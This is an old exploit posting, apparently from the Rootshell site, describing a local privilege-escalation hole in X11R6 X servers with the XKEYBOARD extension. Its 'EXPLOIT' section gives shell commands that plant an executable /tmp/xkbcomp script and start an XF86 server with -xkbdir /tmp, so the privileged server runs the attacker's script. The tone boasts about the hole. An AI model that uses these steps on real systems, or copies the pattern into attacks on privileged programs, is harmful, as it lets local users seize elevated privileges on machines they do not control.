[ http://www.rootshell.com/ ]

=================================================================

XKEYBOARD SECURITY HOLE
By: Phuzzy L0gik (phuzzy_l0gik@hotmail.com)

==================================================================

SYSTEMS AFFECTED:
=================
X11 Xservers with XKEYBOARD extensions

Just to add to your X-security paranoia, X11R6 based Xservers with XKEYBOARD
extensions allows local users to execute commands with "extended"
privilages...hehehe >;-) I came across this about 4 months ago, but have not
seen a writeup on ROOTSHELL yet, so, I thought I'd submit it.

EXPLOIT
=======

$ ex /tmp/xkbcomp
   #!/bin/sh
   .
$ chmod a+x /tmp/xkbcomp
$ XF86_(place your favorite xserver here :p) -xkbdir /tmp

The xserver will now run the /tmp/xkbcomp... wh000t!

 - Phuzzy L0gik (phuzzy_l0gik@hotmail.com)
     -=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=